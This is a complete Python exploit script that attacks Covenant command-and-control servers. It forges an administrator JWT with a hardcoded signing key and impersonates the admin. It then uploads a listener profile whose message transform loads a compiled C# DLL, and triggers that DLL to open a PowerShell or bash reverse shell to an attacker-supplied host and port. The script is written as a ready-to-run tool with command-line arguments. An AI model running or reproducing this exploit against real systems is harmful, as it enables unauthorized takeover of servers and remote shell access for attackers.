import jwt
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request
from subprocess import run
from pwn import remote, context
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time
def check_requirements():
    """Exit with status -1 unless the ``mcs`` compiler can be found on PATH.

    ``mcs`` is looked up with ``shutil.which``; when it is missing, install
    instructions for the Mono framework are printed before exiting.
    """
    if which("mcs") is not None:
        return
    for line in (
        "Please install the mono framework in order to compile the payload.",
        "https://www.mono-project.com/download/stable/",
    ):
        print(line)
    exit(-1)
def random_hex(length):
    """Return a string of *length* random lowercase hexadecimal digits.

    One ``random.choice`` draw is made per character, so the result is not
    suitable as a cryptographic secret.
    """
    hex_digits = "0123456789abcdef"
    picked = []
    for _ in range(length):
        picked.append(random.choice(hex_digits))
    return ''.join(picked)
def request_api(method, token, route, body=""):
    """Send an authenticated JSON request to ``{args.target}/api/{route}``.

    Args:
        method: HTTP verb handed to ``requests.request`` (e.g. "get", "post").
        token: Bearer token placed in the ``Authorization`` header.
        route: Path appended after ``/api/``.
        body: Object serialised as the JSON request body.

    Returns:
        The response object returned by ``requests.request``.
    """
    # Certificate verification is disabled below (verify=False), so silence
    # the warning that would otherwise be raised for each request.
    warnings.simplefilter('ignore', InsecureRequestWarning)
    endpoint = f"{args.target}/api/{route}"
    request_headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    return request(method, endpoint, json=body, headers=request_headers, verify=False)
def craft_jwt(username, userid=None):
    """Build an HS256-signed JWT for *username* with a fixed signing key.

    The token carries the "User" and "Administrator" role claims, uses
    "Covenant" as issuer and audience, and expires 360 seconds after creation.

    Args:
        username: Value of the ``sub`` claim.
        userid: Value of the name-identifier claim. When omitted, a random
            8-4-4-4-12 hexadecimal identifier is generated for this call.
            (Previously the default was an f-string evaluated once at
            definition time, so every call without ``userid`` shared the
            same identifier.)

    Returns:
        The encoded token as returned by ``jwt.encode``.
    """
    if userid is None:
        userid = "-".join(random_hex(width) for width in (8, 4, 4, 4, 12))
    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
    payload_data = {
        "sub": username,
        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
            "User",
            "Administrator"
        ],
        "exp": int(time()) + 360,
        "iss": "Covenant",
        "aud": "Covenant"
    }
    return jwt.encode(payload_data, secret_key, algorithm='HS256')
def get_id_admin(token, json_roles):
    """Resolve the user name and id of a user holding the Administrator role.

    The lookup runs in three steps: find the role named "Administrator" in
    *json_roles*, find the first user/role association for that role via
    ``users/roles``, then find the matching entry in ``users``. Each step
    prints its result; if any step finds nothing the script exits with -1.

    Args:
        token: Bearer token used for the two API requests.
        json_roles: Iterable of role dicts with ``name`` and ``id`` keys.

    Returns:
        Tuple ``(username_admin, id_admin_user)``.
    """
    # Sentinel so that a legitimately falsy/None id is still treated as found.
    not_found = object()

    id_admin = next(
        (role["id"] for role in json_roles if role["name"] == "Administrator"),
        not_found,
    )
    if id_admin is not_found:
        print("\t[!] Did not found admin group id, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin group id : {id_admin}")

    json_users_roles = request_api("get", token, "users/roles").json()
    id_admin_user = next(
        (link["userId"] for link in json_users_roles if link["roleId"] == id_admin),
        not_found,
    )
    if id_admin_user is not_found:
        print("\t[!] Did not found admin id, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin user id : {id_admin_user}")

    json_users = request_api("get", token, "users").json()
    username_admin = next(
        (entry["userName"] for entry in json_users if entry["id"] == id_admin_user),
        not_found,
    )
    if username_admin is not_found:
        print("\t[!] Did not found admin username, quitting !")
        exit(-1)
    print(f"\t[*] Found the admin username : {username_admin}")
    return username_admin, id_admin_user
def compile_payload():
    """Compile a small C# library with ``mcs`` and return it base64-encoded.

    The generated class ``ExampleDLL.Class1`` has a ``Main`` method that calls
    ``System.Diagnostics.Process.Start`` with a command chosen from
    ``args.os``; ``args.lhost`` and ``args.lport`` are concatenated into that
    command as strings. The source is written to a randomly named file under
    ``/tmp``, compiled as a library, read back, and both files are removed.

    Returns:
        The compiled DLL as a base64 string.

    Exits with -1 when the compiler returns a non-zero status. Note that in
    this case the temporary ``.cs`` file is not removed.
    """
    # `payload` is the literal C# argument list (file name, arguments) that is
    # spliced into the Process.Start(...) call below.
    if args.os == "windows":
        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
    else:
        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
    # C# source of the library; the payload arguments are inserted verbatim.
    dll = """using System;
using System.Reflection;
namespace ExampleDLL{
public class Class1{
public Class1(){
}
public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);
}
}
}
"""
    # Base path without extension; ".cs" and ".dll" are appended as needed.
    temp_dll_path = f"/tmp/{random_hex(8)}"
    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")
    compilo_path = which("mcs")
    # "-t:library" asks mcs for a library; the result is read from
    # <temp_dll_path>.dll below.
    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
    if compilation.returncode:
        print("\t[!] Error when compiling DLL, quitting !")
        exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
    # Clean up both the source and the compiled artefact once encoded.
    remove(temp_dll_path + ".cs")
    remove(temp_dll_path + ".dll")
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded
def generate_wrapper(dll_encoded):
    """Return C# source for a ``MessageTransform`` class embedding *dll_encoded*.

    The generated ``Transform`` method base64-decodes the embedded string,
    loads it as an assembly, instantiates every type in it and invokes its
    ``Main`` method (errors are swallowed), then returns the input bytes as
    base64. ``Invert`` is the plain base64 decode.

    Args:
        dll_encoded: Base64 text placed inside the C# string literal.

    Returns:
        The complete C# source as a string.
    """
    # Source up to and including the opening quote of the base64 literal.
    head = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = \""""
    # Source from the closing quote of the base64 literal to the end.
    tail = """\";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { \"\" } };
try {
type.GetMethod(\"Main\").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}
public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}"""
    return "".join((head, dll_encoded, tail))
def upload_profile(token, wrapper):
    """Create an HTTP listener profile whose message transform is *wrapper*.

    Args:
        token: Bearer token used for the API request.
        wrapper: C# source sent as the profile's ``messageTransform``.

    Returns:
        The ``id`` field of the JSON response.

    Exits with -1 when the API response is not OK.
    """
    user_agent = {
        'name': 'User-Agent',
        'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
    }
    cookie = {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
    body = {
        'httpUrls': ['/en-us/index.html', '/en-us/docs.html', '/en-us/test.html'],
        'httpRequestHeaders': [user_agent, cookie],
        'httpResponseHeaders': [{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}],
        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
        'httpGetResponse': '{DATA}',
        'httpPostResponse': '{DATA}',
        'id': 0,
        'name': random_hex(8),
        'description': '',
        'type': 'HTTP',
        'messageTransform': wrapper
    }
    response = request_api("post", token, "profiles/http", body)
    if not response.ok:
        print("\t[!] Failed to create the listener profile, quitting !")
        exit(-1)
    profile_id = response.json().get('id')
    print(f"\t[*] Profile created with id {profile_id}")
    print("\t[*] Successfully created the listener profile")
    return profile_id
def generate_valid_listener_port(impersonate_token, tries=0):
    """Pick a random port in 8000-8250 that no existing listener binds.

    Up to ``10 - tries`` candidates are drawn. For each one the current
    listeners are fetched and the candidate is compared against their
    ``bindPort`` values.

    The previous implementation retried by calling itself but discarded the
    result of that call, so it returned ``None`` whenever the first candidate
    was already taken. The retry is now a loop that returns the chosen port.

    Args:
        impersonate_token: Bearer token used for the API requests.
        tries: Number of attempts already consumed (kept for compatibility).

    Returns:
        The selected port number.

    Exits with -1 once the attempt budget is exhausted.
    """
    for _ in range(tries, 10):
        port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
        listeners = request_api("get", impersonate_token, "listeners").json()
        ports_in_use = {listener["bindPort"] for listener in listeners}
        if port not in ports_in_use:
            print(f"\t[*] Port {port} seems free")
            return port
        print(f"\t[!] Port {port} is already taken by another listener, retrying !")
    print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
    exit(-1)
def get_id_listener_type(impersonate_token, listener_name):
    """Return the id of the listener type named *listener_name*.

    Args:
        impersonate_token: Bearer token used for the API request.
        listener_name: Value compared against each type's ``name`` field.

    Returns:
        The ``id`` of the first matching listener type, or ``None`` when no
        type has that name.

    Exits with -1 when the API response is not OK.
    """
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
        print("\t[!] Failed to get the listener type, quitting !")
        exit(-1)
    matching_type = next(
        (candidate for candidate in response.json() if candidate["name"] == listener_name),
        None,
    )
    if matching_type is None:
        return None
    print(f'\t[*] Found id {matching_type["id"]} for listener {listener_name}')
    return matching_type["id"]
def generate_listener(impersonate_token, profile_id):
    """Create an active HTTP listener bound to 0.0.0.0 using *profile_id*.

    The port comes from ``generate_valid_listener_port`` and the listener
    name is eight random hex digits.

    Args:
        impersonate_token: Bearer token used for the API requests.
        profile_id: Id of the listener profile to attach.

    Returns:
        Tuple ``(listener_id, listener_port)``.

    Exits with -1 when the API response is not OK.
    """
    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    any_address = "0.0.0.0"
    http_type_id = get_id_listener_type(impersonate_token, "HTTP")
    data = {
        'useSSL': False,
        'urls': [f"http://0.0.0.0:{listener_port}"],
        'id': 0,
        'name': listener_name,
        'bindAddress': any_address,
        'bindPort': listener_port,
        'connectAddresses': [any_address],
        'connectPort': listener_port,
        'profileId': profile_id,
        'listenerTypeId': http_type_id,
        'status': 'Active'
    }
    response = request_api("post", impersonate_token, "listeners/http", data)
    if not response.ok:
        print("\t[!] Failed to create the listener, quitting !")
        exit(-1)
    print("\t[*] Successfully created the listener")
    return response.json().get("id"), listener_port
def create_grunt(impersonate_token, data):
    """Request the binary launcher and return its ``stagerCode``.

    A PUT to ``launchers/binary`` is tried first; if its ``stagerCode`` is an
    empty string, the same body is sent with POST.

    Args:
        impersonate_token: Bearer token used for the API requests.
        data: Launcher configuration sent as the JSON body.

    Returns:
        The ``stagerCode`` value from the first response where it is not "".

    Exits with -1 when both responses carry an empty ``stagerCode``.
    """
    for verb in ("put", "post"):
        stager_code = request_api(verb, impersonate_token, "launchers/binary", data).json()["stagerCode"]
        if stager_code != "":
            break
    else:
        print("\t[!] Failed to create the grunt payload, quitting !")
        exit(-1)
    print("\t[*] Successfully created the grunt payload")
    return stager_code
def get_grunt_config(impersonate_token, listener_id):
    """Generate a binary launcher for *listener_id* and parse its stager code.

    Two values are extracted with regular expressions: the base64 string
    passed to ``FromBase64String(@"...")`` and the value assigned to ``aGUID``.

    Args:
        impersonate_token: Bearer token used for the API requests.
        listener_id: Id of the listener the launcher is generated for.

    Returns:
        Tuple ``(aes_key, guid_prefix)`` of the two extracted strings.

    Exits with -1 when either value cannot be found.
    """
    launcher_settings = {
        'id': 0,
        'listenerId': listener_id,
        'implantTemplateId': 1,
        'name': 'Binary',
        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
        'type': 'binary',
        'dotNetVersion': 'Net35',
        'runtimeIdentifier': 'win_x64',
        'validateCert': True,
        'useCertPinning': True,
        'smbPipeName': 'string',
        'delay': 0,
        'jitterPercent': 0,
        'connectAttempts': 0,
        'launcherString': 'GruntHTTP.exe',
        'outputKind': 'consoleApplication',
        'compressStager': False
    }
    stager_code = create_grunt(impersonate_token, launcher_settings)
    key_match = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_match = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not (key_match and guid_match):
        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
        exit(-1)
    aes_key, guid_prefix = key_match.group(1), guid_match.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix
def aes256_cbc_encrypt(key, message):
    """Encrypt *message* with AES-CBC and compute an HMAC-SHA256 over it.

    Args:
        key: Base64-encoded key, used for both the cipher and the HMAC.
        message: Text to encrypt; it is encoded and padded to 16-byte blocks.

    Returns:
        Tuple ``(encrypted, iv_bytes, signature)`` where ``iv_bytes`` is a
        fresh 16-byte random IV and ``signature`` is the HMAC digest of the
        ciphertext only.
    """
    raw_key = base64.b64decode(key)
    iv_bytes = urandom(16)
    padded_plaintext = pad(message.encode(), 16)
    encrypted = AES.new(raw_key, AES.MODE_CBC, iv_bytes).encrypt(padded_plaintext)
    mac = HMAC.new(raw_key, digestmod=SHA256)
    mac.update(encrypted)
    signature = mac.digest()
    return encrypted, iv_bytes, signature
def trigger_exploit(listener_port, aes_key, guid):
    """Send an encrypted message for *guid* to the listener on *listener_port*.

    A fixed RSA public key XML document is encrypted with *aes_key*, wrapped
    in a JSON envelope (GUID, Type, Meta, IV, EncryptedMessage, HMAC), URL-safe
    base64-encoded and placed in the ``data`` field of a form body. The body
    is sent first with a ``Cookie`` header and, if that fails, once more with
    a ``Cookies`` header. The outcome of each attempt is printed.

    Args:
        listener_port: Port of the listener to contact.
        aes_key: Base64-encoded key passed to ``aes256_cbc_encrypt``.
        guid: Identifier placed in the envelope and in the cookie.
    """
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    envelope = {
        "GUID": guid,
        "Type": 0,
        "Meta": '',
        "IV": base64.b64encode(iv).decode(),
        "EncryptedMessage": base64.b64encode(ciphered).decode(),
        "HMAC": base64.b64encode(signature).decode()
    }
    encoded_envelope = base64.urlsafe_b64encode(json.dumps(envelope).encode("utf-8")).decode()
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={encoded_envelope}&session=75db-99b1-25fe4e9afbe58696-320bea73"

    if send_exploit(listener_port, "Cookie", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
        return
    print("\t[!] Exploit failed, retrying")
    if send_exploit(listener_port, "Cookies", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
        return
    print("\t[!] Exploit failed, quitting")
def send_exploit(listener_port, header_cookie, guid, payload):
    """POST *payload* to ``/en-us/test.html`` on the listener over a raw socket.

    The HTTP request is assembled by hand so that the name of the cookie
    header (*header_cookie*) can be chosen by the caller.

    Args:
        listener_port: Port on ``IP_TARGET`` to connect to.
        header_cookie: Header name used for the session cookie line.
        guid: Value of ``ASPSESSIONID`` in that header.
        payload: Form-encoded request body.

    Returns:
        ``True`` when the first chunk received contains "HTTP/1.1 200 OK",
        otherwise ``False``.
    """
    context.log_level = 'error'
    # Named raw_request so the module-level `request` import is not shadowed.
    raw_request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
    sock = remote(IP_TARGET, listener_port)
    try:
        sock.sendline(raw_request)
        response = sock.recv().decode()
    finally:
        # Close the connection even if sending, receiving or decoding fails.
        sock.close()
    return "HTTP/1.1 200 OK" in response
if __name__ == "__main__":
    check_requirements()

    # Positional command-line arguments as (name, add_argument options).
    cli_arguments = (
        ("target", {"help": "URL where the Covenant is hosted, example : https://127.0.0.1:7443"}),
        ("os", {"help": "Operating System of the target", "choices": ["windows", "linux"]}),
        ("lhost", {"help": "IP of the machine that will receive the reverse shell"}),
        ("lport", {"help": "Port of the machine that will receive the reverse shell"}),
    )
    parser = argparse.ArgumentParser()
    for argument_name, argument_options in cli_arguments:
        parser.add_argument(argument_name, **argument_options)

    # `args` and `IP_TARGET` are read as module-level globals by the
    # functions above, so they must be assigned here at module scope.
    args = parser.parse_args()
    IP_TARGET = urlparse(args.target).hostname

    print("[*] Getting the admin info")
    sacrificial_token = craft_jwt("xThaz")
    admin_username, admin_id = get_id_admin(
        sacrificial_token,
        request_api("get", sacrificial_token, "roles").json(),
    )
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

    print("[*] Generating payload")
    wrapper = generate_wrapper(compile_payload())

    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)

    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)

    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")